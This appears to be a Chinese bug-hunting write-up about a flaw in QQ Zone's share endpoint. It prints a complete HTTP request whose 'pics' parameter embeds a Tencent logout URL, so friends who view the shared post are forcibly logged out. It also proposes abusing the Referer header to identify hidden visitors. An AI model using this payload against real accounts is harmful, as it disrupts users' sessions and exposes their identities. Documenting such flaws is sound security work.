@1kbfree
2019-06-27T20:23:24.000000Z
字数 1422
阅读 1021
漏洞挖掘
1、发送如下数据包
POST /cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=1395430061&qzonetoken=3ca935b4acf8031d273301661877e5b2c7d888e0655d828df4496c05672e3898a1842753399054f2affef6ad HTTP/1.1
Host: sns.qzone.qq.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?desc=%E6%B5%8B%E8%AF%95%E4%B8%80%E4%B8%8B%E5%95%A6~&url=http://www.qq.com&showcount=1&desc=123&pics=http://www.slimego.cn/images/logo.png
Content-Length: 300
Cookie: 这是cookie
DNT: 1
Connection: close
where=0&entryuin=1900065568&spaceuin=1900065568&title=123321&summary=123321&token=1395430061&sendparam=&description=%E6%B5%8B%E8%AF%95%E4%B8%80%E4%B8%8B%E5%95%A6~&type=4&url=http%3A%2F%2Fwww.qq.com&site=&to=&share2weibo=0&pics=https://pay.qq.com/cgi-bin/login/user_logout.cgi?1.png&fupdate=1¬ice=1
注意这里的pics
参数,这个值是一个 类似退出的url
那么这里的思路就是 用户点开空间然后<img src=https://pay.qq.com/cgi-bin/login/user_logout.cgi?1.png>
,如图
导致用户后台自动访问退出的url
(但是腾讯空间的退出url
存在token
,所以这是另一处清除域cookie
的url
)
那么来测试一下,有另一个号 点开空间
然后在刷新一下就会退出
那么现在的危害就是,让我刷空间的好友 后台自动访问退出的url
然后导致无法正常操作 如评论、点赞、转发、发说说等 并且会一直跳转到登录处 所以个人觉得危害还是挺大的 而且这个方法还可以利用为获取到谁访问了qq
空间(这个是针对那些黄钻会员隐藏了空间来源访问),那么我们就可以写入一个来源访问系统的,然后利用Referer
所传递的值来知道是谁访问了我的qq
空间(当我们登录qq空间后 会将手机号带入到url
中,所以可以获取到访问我qq空间的用户的qq号,虽然危害不大 但是还算是一个设计缺陷 导致了外联可以访问)